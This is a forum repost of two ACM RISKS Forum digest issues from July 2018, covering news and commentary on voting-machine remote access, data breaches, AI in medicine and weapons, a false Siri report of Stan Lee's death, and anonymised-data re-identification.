    Unfortunately, the answer is not easily Googled.

    http://www.wired.com/story/the-complexity-of-simply-searching-for-medical-advice

    The risk? Energetic advocates of nonsense.

    ------------------------------

    Date: Fri, 6 Jul 2018 18:11:27 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: According to Apple's digital assistant Siri, Marvel comic book
    legend Stan Lee had apparently died on Monday (Business Insider Singapore)

    Comic book fans were in for a shock this week when they were told that
    Marvel comic book legend Stan Lee, had passed away on Monday (July 2).

    The `news' was broken by Apple's digital assistant Siri, as reported first
    by CinemaBlend.
    http://www.cinemablend.com/news/2444550/siri-is-telling-people-stan-lee-died-yesterday

    While Stan Lee is still alive and well at the sprightly age of 95, it did
    not stop Siri from telling users that he had *died* on July 2, 2018, when
    asked how old he was.

    Siri has since corrected the information, but it still raises questions as
    to how the software got it wrong.

    The problem can be traced back to Lee's Wikipedia page
    http://en.wikipedia.org/wiki/Stan_Lee
    http://io9.gizmodo.com/siri-erroneously-told-people-stan-lee-was-dead-1827322243

    In the recent profile history of Lee, user `&beer&love' changed Lee's Wiki
    data to include a `date of death', pronouncing him dead.

    http://www.businessinsider.sg/siri-stan-lee-died-on-monday/

    Siri relying for information on Wikipedia which can be changed by anyone,
    even &beer&love. Sure beats those dusty encyclopedia volumes I grew up with.

    ------------------------------

    Date: Thu, 5 Jul 2018 11:16:18 -0800
    From: Rob Slade <rms...@shaw.ca>
    Subject: Risk and cost/benefit ...

    I live in Vancouver, British Columbia, Canada. We have an abundance of
    natural beauty. Therefore, we also have an abundance of tourists.

    I was born here. (So were my parents. And 75% of my grandparents.) Those
    of us who are long time residents know that the natural beauty comes with
    some natural dangers.

    A lot of the tourists don't seem to realize that. In our social media
    intense and almost virtual world, people don't seem to realize that you
    can't just press *undo* or *reload* when you do something stupid in the real
    world.
    http://vancouversun.com/news/local-news/rugged-b-c-locales-are-a-magnet-for-selfie-seekers
    or http://is.gd/C1rOty

    And we also seem to have a society that idolizes risk-taking. You've got to
    live `on the edge'. You've got to get closer to the edge than anyone else.

    Well, sometimes when you get too close to the edge, you fall off.
    http://vancouversun.com/news/local-...for-trio-missing-near-squamishs-shannon-falls or
    http://is.gd/qolaca

    We've got a big tourist industry in BC. (No, it's not just a business here,
    it's an industry.) We've got lots of companies that spend time and money
    taking people out into the wild. In a (reasonably) safe way. But, for
    some, that isn't enough. They've got to go beyond the bounds. And then
    they get into trouble.

    I live near Lynn Canyon. I live between the fire station and Lynn Canyon.
    We hear the sirens all the time, indicating that some tourist has decided
    that he's (it's usually he, or her, when some idiot convinces his girlfriend
    to accompany him) smarter than the locals who posted all the ``don't jump off
    dangerous areas'' signs. We heard them again last night. It was late last
    night, so I assume that whoever killed himself last night hasn't made the
    news sites yet.
    http://vancouversun.com/news/local-...ehaviour-in-lynn-canyon-north-shore-mountains or
    http://is.gd/ghM3w2

    For the reasons stated above, we have some of the best search and rescue
    volunteers in the world in our neck of the woods. They are, unfortunately,
    extremely experienced. We have, also unfortunately, a bunch of helicopter
    pilots who have lots of experience in trying to put a helicopter into deep
    canyons, or very close to waterfalls, or rock faces. It's dangerous work.
    Forced upon us by tourists who want the ultimate selfie ...

    ------------------------------

    Date: Thu, 5 Jul 2018 16:18:16 -0700
    From: "Robert R. Fenichel" <b...@fenichel.net>
    Subject: Employees as subjects in clinical trials (Re: Stein, RISKS-30.74)

    Richard M. Stein suggests that when AI-based diagnostic programs are
    tested in randomized clinical trials (RCTs), the affected patients
    should be the vendor's employees and their families. This is
    problematic.

    In evaluating diagnostic methods, several different sorts of RCTs
    can be contemplated. A trial might demonstrate that the new method
    (a) provided the same information as old methods, perhaps more
    quickly or at lower cost; or
    (b) provided new information that was of interest, but did not alter
    patient or physician behavior; or
    (c) provided new information that changed patient or physician behavior; or
    (d) changed patient-perceived outcome (feeling better or living longer).

    At the upper end of this scale (certainly (d), probably (c)), some of the
    patients in a given RCT will be winners, and some will be losers. Some
    people want to play this game, and some don't.

    Recruitment into RCTs is generally considered unethical when the recruited
    patients are not fully at liberty to decline participation. This generally
    excludes prisoners and employees. Even when consent can be freely given
    (say, by an academic researcher experimenting on himself or herself*),
    trials in developed countries are subject to vetting by outside arbiters to
    be sure that the investigators are not, perhaps out of honest enthusiasm,
    inadvertently exposing subjects (even if the subjects are themselves) to
    unnecessary risks.

    Independent of the problem of obtaining freely-given consent from employees,
    there are potential problems of bias. As Stein notes, any such trial would
    need to be evaluated by non-conflicted reviewers. Similarly, patients with
    conflicts of interest** can lead to doubt about the soundness of a trial's
    results, depending on the credibility of the blinding, which is rarely
    perfect.

    * There is of course a long history of that, notably including the
    first cardiac catheterization.
    ** Wanting to be successfully treated is not a conflict of interest,
    but wanting one treatment or diagnostic process to work better than
    another might be.

    ------------------------------

    Date: 5 Jul 2018 22:05:17 -0400
    From: "John Levine" <jo...@iecc.com>
    Subject: Re: Google is training machines to predict when a patient will die
    (Stein and LA Times, R 30 74)

    I looked at the article you linked to, and I'm pretty sure that you sent the
    wrong link since there is nothing in the article even vaguely like *death
    panels*. It's about diagnosis based on a wider than usual range of patient
    data.

    The closest thing was a paragraph in which a hospital's system looked at a
    very sick patient and estimated she had a 9% chance of dying during her
    stay, Google's AI thought it was 19% and she indeed died a few days later.
    That tells us she was sicker than she looked but nothing about whether her
    treatment was appropriate for her condition.

    On the other hand, we have a lot of work to do with or without machines to
    manage treatment of people who are terminally ill. Americans spend vast
    amounts on futile care in the last few weeks or days of life of people who
    will die no matter what we do. I expect that computers can be of some use
    figuring out what treatments might help and which are just painful and
    pointless.

    ------------------------------

    Date: Fri, 6 Jul 2018 14:11:49 +0800
    From: Richard M Stein <rmste...@gmail.com>
    Subject: Re: Google is training machines to predict when a patient will die
    (Levine, R 30 75)

    John -- Agreed about end of life healthcare expenditures; they are often
    onerous.

    My extrapolation of Medical Brain (MB) AI as a *death panel* proxy is
    premature, given state of readiness to deploy. I chose the label based on
    former Gov. Palin's campaign hyperbole to emphasize potential adoption and
    deployment of MB's predictive diagnostic capability. Clearly, connecting MB
    to a patient's IV infusion pump, respirator, or other life support device
    would be unwise and inhumane.

    When I read the LA Times piece, I imagined a hospital or hospice-bound
    patient with a `Do Not Resuscitate' (DNR) order tied to their health records
    under continuous MB monitoring near end of life (EOL).

    As a hypothetical, suppose MB EOL initiation was an opt-in choice? I asked
    myself, ``What MB outcome would trigger the live/die threshold: 50.1% or 22%
    or 90%?'' In light of MB diagnostic prediction, should DNRs have an extra
    field to specify an MB live/die outcome threshold that automates end of life
    sequence initiation, perhaps a morphine drip?

    A dystopian expectation, based on pure economic and business prerogatives,
    suggests that delegation of automated live/die choices will emerge. The
    nefarious intrusion of technology into life and death decisions promotes
    choice acceleration over deliberation; MB deployment demotes human sympathy
    to insignificance by pure computation. Some people might prefer a Magic
    8-ball to decide, not a stack of software toxic waste.

    ------------------------------

    Date: 6 Jul 2018 11:45:18 -0400
    From: "John R. Levine" <jo...@iecc.com>
    Subject: Re: Google is training machines to predict when a patient will die
    (Stein, R 30 75)

    > My extrapolation of Medical Brain (MB) AI as a *death panel* proxy is
    > premature, given state of readiness to deploy.

    It's not premature, it's just silly. There is a great deal of work around
    the world looking at what treatment is cost-effective under what conditions.
    This is not exactly a new frontier of inquiry.

    One of the best-known is NICE, the National Institute for Health and Care
    Excellence in the UK. It is a major reason that even though the NHS spends
    less than half per person what we do in the US, and has well known funding
    and management problems, people in the UK are nonetheless about as healthy
    as in the US.

    NICE really is a death panel, and sometimes turns down treatments that might
    hypothetically extend someone's life, because the cost is too far out of
    line with the potential benefit. I'd rather a death panel run transparently
    with a goal of improving the country's health to ones we have in the US, run
    in secret with a goal of maximizing my insurance company's dividends.

    http://www.nice.org.uk/

    obRisks: shiny new technical things can be very distracting

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.75
    ************************
     
  11. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    RISKS List Owner

    Jul 20, 2018 7:06 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Friday 20 July 2018 Volume 30 : Issue 76

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Top Voting Machine Vendor Admits It Installed Remote-Access Software
    on Systems Sold to States (Kim Zetter)
    Rosenstein reveals how the Justice Department is fighting attacks
    on US elections (CNBC)
    How the Russians hacked the DNC and passed its emails to WikiLeaks (WashPo)
    Russia exploited Twitter for disinformation as early as 2014,
    targeting local news (Boingboing)
    We've unleashed AI. Now we need a treaty to control it. (latimes.com)
    AI Innovators Take Pledge Against Autonomous Killer Weapons (npr.org)
    The cameras that know if you're happy - or a threat (bbc.com)
    Millions of Verizon customer records exposed in security lapse (ZDNet)
    Ticketmaster breach was part of a larger credit card skimming
    effort, analysis shows (ZDNet)
    Doctors, hospitals sue patients posting negative online comments (USA Today)
    Facial Recognition Shows Promise for Data Center Security (EWeek)
    Shutting down an entire ATM network (JapanTimes)
    Some food stamp recipients may soon lose access to farmers market benefits
    (WashPo)
    Tesla Powerwall2 home battery hacking? (Henry Baker)
    China Expands Surveillance of Sewage to Police Illegal Drug Use
    (Scientific American)
    Hunting the Con Queen of Hollywood (Hollywood Reporter)
    Micro SD cards silently switching to read-only when they're "too old"
    (Benoit Goas)
    Birds are making expensive roaming calls (The Register)
    Robo-calls are getting worse. And some big businesses soon could
    start calling you even more. (WashPo)
    Smart Mouthguard Senses Muscle Fatigue (Scientific American)
    Risks on a Friday the 13th ... (Rob Slade)
    We're not allowed to die anymore (NYTimes)
    'Data is a fingerprint': why you aren't as anonymous as you think
    online (Olivia Stein)
    Re: FACEPTION (Rob Slade)
    Re: Employees as subjects in clinical trials (Dmitiri Maziuk)
    Re: Video: Gavin Williamson hilariously interrupted by Siri (Amos Shapir)
    Sami Saydjari: Engineering Trustworthy Systems (PGN)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 17 Jul 2018 06:46:32 -1000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: Top Voting Machine Vendor Admits It Installed Remote-Access Software
    on Systems Sold to States (Kim Zetter)

    Kim Zetter, Motherboard
    Remote-access software and modems on election equipment 'is the worst
    decision for security short of leaving ballot boxes on a Moscow street
    corner.'

    Election Systems and Software, ``the nation's top voting machine maker has
    admitted in a letter to a federal lawmaker that the company installed
    remote-access software on election-management systems it sold over a period
    of six years, raising questions about the security of those systems and the
    integrity of elections that were conducted with them...''

    In a letter sent to Sen. Ron Wyden (D-OR) in April and obtained recently by
    Motherboard, Election Systems and Software acknowledged that it had
    ``provided pcAnywhere remote connection software ... to a small number of
    customers between 2000 and 2006'' which was installed on the
    election-management system ES&S sold them.

    The statement contradicts what the company told me and fact checkers for a
    story I wrote for *The New York Times* in February. At that time, a
    spokesperson said ES&S had never installed pcAnywhere on any election system
    it sold. ``None of the employees, ... including long-tenured employees, has
    any knowledge that our voting systems have ever been sold with remote-access
    software,'' the spokesperson said. [KZ]

    Top Voting Machine Vendor Admits It Installed Remote-Access Software on Systems Sold to States

    [Kim Zetter has been superb in her long-time reporting on election
    integrity -- and the lack thereof -- and many other RISKS-related topics.
    Her article is extremely timely, and just one more serious warning of the
    potential risks. PGN]

    ------------------------------

    Date: Fri, 20 Jul 2018 12:01:46 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Rosenstein reveals how the Justice Department is fighting attacks
    on US elections (CNBC)

    The document highlights the increasing critical role that private-sector
    companies are playing in national security matters.

    https://www.cnbc.com/2018/07/20/how-the-justice-department-is-fighting-election-threats-cybercrime.html

    ------------------------------

    Date: Sat, 14 Jul 2018 20:02:29 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: How the Russians hacked the DNC and passed its emails to WikiLeaks
    (WashPo)

    The special counsel's indictment of 12 Russian intelligence officers is a
    technical guide to the Kremlin's 2016 operation.

    How the Russians hacked the DNC and passed its emails to WikiLeaks

    ------------------------------

    Date: Thu, 12 Jul 2018 12:08:38 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Russia exploited Twitter for disinformation as early as 2014,
    targeting local news (Boingboing)

    via NNSquad
    Russia exploited Twitter for disinformation as early as 2014, targeting local news

    As early as 2014, Russian operatives working out of the Internet Research
    Agency (IRC) in St. Petersburg were busy creating fake Twitter accounts
    for U.S. local news organizations that did not exist.

    ------------------------------

    Date: Tue, 17 Jul 2018 12:28:21 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: We've unleashed AI. Now we need a treaty to control it.
    (latimes.com)

    We've unleashed AI. Now we need a treaty to control it

    "The treaty would enshrine certain basic principles. The concept of
    "human-in-command" to guarantee that people retain control over AI should
    be a priority. Standards would be set for monitoring AI
    systems. Fundamental human rights should be specifically protected. A new
    international body should be created for oversight, similar to the
    International Atomic Energy Agency.

    "The obstacles are apparent, from rogue nations and monopoly-minded
    companies to the sorry state of international cooperation. But advances in
    AI and machine learning are moving so fast that today seems like
    yesterday, making the challenge urgent."

    Daniel H. Wilson, the author of "How to Survive a Robot Uprising" is a good
    candidate to lead treaty negotiations.

    Certain nations do not respect existing treaties governing human rights,
    WMDs, or even climate change accelerants. What possible incentives will
    motivate treaty compliance and membership in a hypothesized IAAIR -- the
    International Agency for Artificial Intelligence and Robotics?

    ------------------------------

    Date: Thu, 19 Jul 2018 15:33:47 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: AI Innovators Take Pledge Against Autonomous Killer Weapons (npr.org)

    AI Innovators Take Pledge Against Autonomous Killer Weapons

    "... we the undersigned agree that the decision to take a human life
    should never be delegated to a machine," the pledge says. It goes on to
    say, "... we will neither participate in nor support the development,
    manufacture, trade, or use of lethal autonomous weapons."

    Compare with the IEEE Code of Ethics, Article 1:

    "to hold paramount the safety, health, and welfare of the public, to
    strive to comply with ethical design and sustainable development
    practices, and to disclose promptly factors that might endanger the public
    or the environment;"

    The articles of the ACM Code of Ethics express similar intent.

    This pledge, while sincere and honorable, ignores long-established
    professional ethics and practices. Creativity's thrill apparently infected
    our colleagues' judgment, inducing myopia and amnesia toward these legacy
    guiding principles. Perhaps research grants were too enticing to refuse
    without risking university tenure or employment promotion opportunity?

    Open-source neural networks and artificial life training platforms enable
    even the smallest nation to initiate an autonomous killer program. These
    weapons will likely populate the next battlefield; the "human-in-control"
    probably far away from the conflict zone. I doubt "Real Steel" engagement
    will become an effective tactic during a swarm intelligence battle.

    This leads to the question of how to possibly sterilize a battlefield
    deployment of AI-driven killers. A micro-EMP (preferably non-nuclear) might
    do it. A cluster-bomb of radar-guided or passive-metal-seeking ultra-tasers?

    ------------------------------

    Date: Thu, 19 Jul 2018 15:14:27 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: The cameras that know if you're happy - or a threat (bbc.com)

    The cameras that know if you're happy - or a threat

    This technology motivates the old aphorism to "Keep smiling, the boss likes
    idiots." I wonder if employers will institute a "smile or frown" score as
    part of performance reviews?

    ------------------------------

    Date: Sun, 15 Jul 2018 00:51:30 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Millions of Verizon customer records exposed in security lapse
    (ZDNet)

    Customer records for at least 14 million subscribers, including phone
    numbers and account PINs, were exposed.

    https://www.zdnet.com/article/millions-verizon-customer-records-israeli-data/

    ------------------------------

    Date: Sat, 14 Jul 2018 18:57:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Ticketmaster breach was part of a larger credit card skimming
    effort, analysis shows (ZDNet)

    https://www.zdnet.com/article/ticke...r-credit-card-skimming-effort-analysis-shows/

    ------------------------------

    Date: Wed, 18 Jul 2018 09:50:32 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Doctors, hospitals sue patients posting negative online comments
    (USA Today)

    http://www.usatoday.com/story/news/...s-posting-negative-online-comments/763981002/

    ------------------------------

    Date: Sat, 14 Jul 2018 11:03:19 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Facial Recognition Shows Promise for Data Center Security
    (EWeek)

    While Ramos' trial is still months away, the successful use of computer
    technology to confirm a murder suspect's identity made it clear that facial
    recognition systems have reached the point where they can perform reliably
    enough to identify a random person fairly reliably.

    http://www.eweek.com/security/facial-recognition-shows-promise-as-next-step-in-corporate-security

    "Fairly reliably" -- new horizons in mistaken identity? New questions needed
    for defense lawyers to cross-examine facial recognition systems?

    ------------------------------

    Date: Mon, 16 Jul 2018 19:08:58 +0900
    From: Rodney Van Meter <r...@sfc.wide.ad.jp>
    Subject: Shutting down an entire ATM network (JapanTimes)

    Mizuho Bank is one of the largest banks in Japan. Today (Monday, Japan time)
    is the last day of a three-day weekend. Mizuho decided to shut down *its
    entire ATM network* from midnight Friday night until 8a.m. Tuesday, so they
    could perform a flag day (maybe even forklift? not sure) upgrade on ATM
    software. Apparently, it's not just their own ATMs, but any 7-11 or other
    ATMs that would also normally give you access to your account cannot; it's a
    backend upgrade as well as frontend.

    Short blurb in English:
    http://www.japantimes.co.jp/news/20...three-day-weekend/#.W0xs8tgzbOQ40c4d5e9075|1D

    Short article in Japanese:
    http://headlines.yahoo.co.jp/hl?a=20180714-00010006-bfj-bus_all

    *Mizuho nammin*, or *Mizuho refugees*
    https://twitter.com/hashtag/%E3%81%...d5eb04283b|40779d3379c44626b8bf140c4d5e9075|1

    I'm sure the risks of this are pretty obvious to readers here. Suffice it
    to say, their 24 million customers aren't happy.

    ------------------------------

    Date: Sun, 15 Jul 2018 15:00:58 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Some food stamp recipients may soon lose access to farmers market
    benefits (WashPo)

    The Washington Post

    Josh Wiles, Novo Dia's founder and president, cited several reasons for the
    company's shutdown. The marketplace for SNAP transactions is highly
    regulated and requires extra (read: expensive) security measures beyond what
    is required for credit cards or debit cards. The profits are small because
    markets and individual farmers process micro-payments, often as little as a
    few dollars.

    The *tipping point*, though, Wiles said, was the decision by the new
    administrator of the SNAP equipment program to work with electronic-payment
    giant First Data, rather than Novo Dia and its Mobile Market app.

    Without continuing to gain new customers and economies of scale, Wiles said,
    Novo Dia could not remain financially viable: ``Once it became clear that we
    were not going to be part of it, we knew we would not be able to scale in a
    manner that allowed us to be profitable or even sustainable.''

    https://www.washingtonpost.com/life...fb2caa-838d-11e8-8f6c-46cb43e3f306_story.html

    ------------------------------

    Date: Tue, 17 Jul 2018 14:47:07 -0700
    From: Henry Baker <hba...@pipeline.com>
    Subject: Tesla Powerwall2 home battery hacking?

    I'm not the only one who's noticed that the Tesla "Powerwall2" home battery
    system uses the same ubiquitous "CAN bus" found in automobiles. (Duh! It
    appears that the Powerwall2 is basically 1/4 of a standard base Tesla Model
    3 battery.) Many home battery systems utilize several Powerwall2's, and
    hence approximate 1/4-3/4 of the energy storage capacity of a Tesla base
    Model 3.

    After a number of notorious car hacks using this same CAN bus over the past
    several years, what could possibly go wrong with a Powerwall2 system --
    having the equivalent of several gallons of gasoline stored within its
    batteries -- in/on your home?

    Furthermore, the Powerwall2 is connected to the Internet through your home
    router, so that the Tesla cellphone app can talk to Tesla and hence to your
    Powerwall2.

    Now Tesla has apparently put in a lot of effort into securing the
    communications of its *autos*, but I wonder if this same level of effort has
    been invested in the security of the Powerwall2?

    Unlike the Tesla automobile, which is connected only sporadically with the
    Internet, your home Powerwall2 is presumably capable of being attacked 24x7.

    It's also possible that a standard auto OBD-II connector could be installed
    by a hacker directly on the Powerwall2 -- after all, many Powerwall2 systems
    are mounted *outside the house*. With an OBD-II and Bluetooth/Wifi, hacking
    could then be done discreetly from a nearby vehicle, and would completely
    bypass any security built into the Powerwall2's own wifi connection.

    Click once to turn off the refrigerator; click twice to *halt and catch
    fire*.

    ------------------------------

    Date: Tue, 17 Jul 2018 12:32:19 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: China Expands Surveillance of Sewage to Police Illegal Drug Use
    (Scientific American)

    https://www.scientificamerican.com/...illance-of-sewage-to-police-illegal-drug-use/

    April Fools for 2019: The PRC expands surveillance to detect halitosis and BO.

    ------------------------------

    Date: Fri, 13 Jul 2018 22:52:16 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Hunting the Con Queen of Hollywood (Hollywood Reporter)

    For more than a year, some of the most powerful women in entertainment --
    including Amy Pascal, Kathleen Kennedy, Stacey Snider and a 'Homeland'
    director -- have been impersonated by a cunning thief who targets insiders
    with promises of work, then bilks them out of thousands of dollars. The
    Hollywood Reporter has obtained exclusive audio recordings of the savvy
    imposter as victims come forward and a global investigation heats up. ...

    For a long time, Linka Glatter thought she was alone in being faked. She
    tried to contact the police and the FBI, but neither showed interest. The
    amount of money involved was too small, they told her. She hired a private
    investigator, who discovered that the scammers were using burner phones to
    cover their tracks and GoDaddy accounts for fake email addresses. She
    contacted corporate security at a major Hollywood studio, but that didn't
    help either. The calls kept coming. One day, a well-known political
    consultant in Washington got in touch.

    http://www.hollywoodreporter.com/features/hunting-con-queen-hollywood-1125932

    ------------------------------

    Date: Mon, 16 Jul 2018 23:38:44 +0200
    From: Benoit Goas <goa...@hawk.iit.edu>
    Subject: Micro SD cards silently switching to read-only when they're "too old"

    The 64G Patriot micro SD I had been using in my cell phone from mid 2014
    just decided to turn itself into a read-only memory card. From what I read,
    it most likely reached its maximum number of uses, as it happens at least
    with some Samsung cards too. It would be to protect the card from losing
    all its data, after its cells were erased "too many times" (limit number
    depending on the card, and appearing to be in the order of 10-100k). And
    according to Internet forums, and card reviews on Amazon, it looks like it's
    getting more and more common!

    A very bad point is that there were no error messages at all. I added music
    files before a trip, but I had none of the new files available later so at
    first I thought I didn't do it correctly (even if the transfer was fine, it
    could for example have been to my card backup on a hard drive instead of
    going to the actual card). Then, despite the pictures still being taken
    correctly by my phone (browsing was OK, able to delete the bad ones...), I
    lost all of the new ones when my phone rebooted. So they were only in a
    cache memory somewhere, but nowhere on the SD card (not found by deep
    recovery tools either). More fun, the older ones I deleted came back during
    the same reboot...

    I understand it would be bothersome to have an error message at each card
    access, but at least I would have known to change the card and would not
    have lost 3 days of pictures! So beware...

    ------------------------------

    Date: Mon, 16 Jul 2018 23:36:43 +0200
    From: Benoit Goas <goa...@hawk.iit.edu>
    Subject: Birds are making expensive roaming calls (The Register)

    A new risk when tracking birds (or any other kind of stuff): someone
    managed to recover the SIM card from the tracker, and used it!
    More detailed story at either
    https://www.theregister.co.uk/2018/07/03/stork_mobile_theft/
    or
    http://www.iflscience.com/plants-an...racks-up-2700-on-researchers-cell-phone-bill/

    ------------------------------

    Date: Fri, 13 Jul 2018 21:42:47 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Robo-calls are getting worse. And some big businesses soon could
    start calling you even more. (WashPo)

    Robocalls ravaged Americans' smartphones in record numbers last month. But
    some of the nation's top businesses are still urging the Trump
    administration to make it easier for them to dial and text mobile devices en
    masse.

    http://www.washingtonpost.com/techn...esses-soon-could-start-calling-you-even-more/

    ------------------------------

    Date: Fri, 13 Jul 2018 09:33:15 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Smart Mouthguard Senses Muscle Fatigue (Scientific American)

    http://www.scientificamerican.com/podcast/episode/smart-mouthguard-senses-muscle-fatigue/

    "The mouth guard's batteries are rechargeable wirelessly, and the device
    can use low-power Bluetooth to send information to smartphones, watches
    and other electronic devices."

    Athlete bio-surveillance provides clues about peak performance and
    degradation under physical stress. This telemetry stream, if clear text
    and not subject to privacy management protection, can be exploited by
    gaming interests.

    ------------------------------

    Date: Fri, 13 Jul 2018 12:14:57 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Risks on a Friday the 13th ...

    Happy Friday the 13th to all you professional paranoiacs out there.

    I have previously mentioned some of the risks involved in living here.
    http://community.isc2.org/t5/Career/Risk-and-cost-benefit/m-p/12101

    In addition, the Lion's Gate Bridge is closed today, due to a "police
    incident." (That probably means a jumper.) This also means that the
    Ironworker's Memorial Second Narrows Bridge (and for risk fans I can
    recommend "Tragedy at Second Narrows," by Eric Jamieson) is completely
    clogged in both directions, while the Seabus has at least a two, and
    possibly as high as four, sailing wait.

    But that isn't the risk I wanted to talk about today.

    We have bears here.

    (When I was a young lad at university, back before there was an Internet, my
    residence had a fellow from Cambridge whose family, back in The Olde
    Country, were terrified that he would be eaten by a bear. So, whenever
    there were reports of bears in the north side communities, we helpfully cut
    out the stories for him to send back to his family.)

    Black bears are fairly cute, and not as vicious as grizzlies. But it is not
    a good idea to feed them. It's dangerous for people, and it's dangerous for
    the bears, too. (They get acclimated, and come to regard people as sources
    of food, and then there is trouble, and often the bears get shot.) So there
    are laws, here, prohibiting people from feeding bears.

    Some people do it anyway.

    http://vancouversun.com/news/local-...er-investigation-for-feeding-bears-from-house
    or
    http://is.gd/mq6okV

    Now, if you are going to break the law, it might be a good idea not to post
    videos of you doing so on your social media account ...

    ------------------------------

    From: Benoit Goas <goa...@hawk.iit.edu>
    Date: Mon, 16 Jul 2018 23:36:09 +0200
    Subject: We're not allowed to die anymore (NYTimes)

    We still get some crazy cases with digitized processes: PayPal Apologizes
    for Letter Demanding Payment From Woman Who Died of Cancer:
    https://www.nytimes.com/2018/07/11/business/paypal-dead-wife-husband-letter-nyt.html

    So many corner/special cases to think about!

    In the same kind of problems, a(n old) friend of mine died recently, and
    Facebook wants me to organize an event for his birthday later this month.
    But at least, despite the posts by his family on his page, I guess Facebook
    doesn't know he's dead. Not like PayPal!

    ------------------------------

    Date: July 15, 2018 at 6:27:54 AM GMT+9
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: 'Data is a fingerprint': why you aren't as anonymous as you think
    online (Olivia Stein)

    Olivia Solon, *The Guardian*, 13 Jul 2018
    So-called *anonymous* data can be easily used to identify everything from
    our medical records to purchase histories

    http://www.theguardian.com/world/20...rowsing-data-medical-records-identity-privacy

    In August 2016, the Australian government released an `anonymised' data set
    comprising the medical billing records, including every prescription and
    surgery, of 2.9 million people.

    Names and other identifying features were removed from the records in an
    effort to protect individuals' privacy, but a research team from the
    University of Melbourne soon discovered that it was simple to re-identify
    people, and learn about their entire medical history without their consent,
    by comparing the dataset to other publicly available information, such as
    reports of celebrities having babies or athletes having surgeries.

    The government pulled the data from its website, but not before it had been
    downloaded 1,500 times.

    This privacy nightmare is one of many examples of seemingly innocuous,
    de-identified pieces of information being reverse-engineered to expose
    people's identities. And it's only getting worse as people spend more of
    their lives online, sprinkling digital breadcrumbs that can be traced back
    to them to violate their privacy in ways they never expected.

    Nameless New York taxi logs were compared with paparazzi shots at locations
    around the city to reveal that Bradley Cooper and Jessica Alba were bad
    tippers. In 2017 German researchers were able to identify people based on
    their `anonymous' web browsing patterns. This week University College London
    researchers showed how they could identify an individual Twitter user based
    on the metadata associated with their tweets, while the fitness tracking app
    Polar revealed the homes and in some cases names of soldiers and spies.

    ``It's convenient to pretend it's hard to re-identify people, but it's
    easy. The kinds of things we did are the kinds of things that any first-year
    data science student could do,'' said Vanessa Teague, one of the University
    of Melbourne researchers to reveal the flaws in the open health data.

    One of the earliest examples of this type of privacy violation occurred in
    1996 when the Massachusetts Group Insurance Commission released `anonymised'
    data showing the hospital visits of state employees. As with the Australian
    data, the state removed obvious identifiers like name, address and social
    security number. Then the governor, William Weld, assured the public that
    patients' privacy was protected.

    Latanya Sweeney, a computer science grad who later became the chief
    technology officer at the Federal Trade Commission, showed how wrong Weld
    was by finding his medical records in the data set. Sweeney used Weld's zip
    code and birth date, taken from voter rolls, and the knowledge that he had
    visited the hospital on a particular day after collapsing during a public
    ceremony, to track him down. She sent his medical records to his office.

    In later work, Sweeney showed that 87% of the population of the United
    States could be uniquely identified by their date of birth, gender and
    five-digit zip codes. ``The point is that data that may look anonymous is
    not necessarily anonymous,'' she said in testimony to a Department of
    Homeland Security privacy committee.

